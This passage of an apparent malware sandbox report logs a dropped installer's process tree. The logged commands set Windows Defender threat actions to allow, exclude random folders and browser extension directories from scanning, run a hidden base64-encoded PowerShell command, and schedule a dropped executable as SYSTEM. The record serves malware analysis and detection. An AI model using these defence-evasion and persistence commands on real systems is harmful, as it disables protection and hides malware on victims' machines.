      4⤵
      PID:2720
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2076
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1496
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2240
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:1676
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6124
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3492
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5600
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1248
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:656
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5348
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5304
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gaosyBwyz" /SC once /ST 11:50:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gaosyBwyz"
  2⤵
  PID:4808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gaosyBwyz"
  2⤵
  PID:5392
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 16:26:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\kUqwojQ.exe\" GH /HyaMdidUQ 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2960
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:5772

C:\Users\Admin\AppData\Local\Temp\7zS5203.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS5203.tmp\Install.exe it /NTzdidTKCG 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5872
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5808
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:1124
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5768
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:3536
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5088
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4552
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:2304
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:2684
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5492
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:1840
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1560
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6068
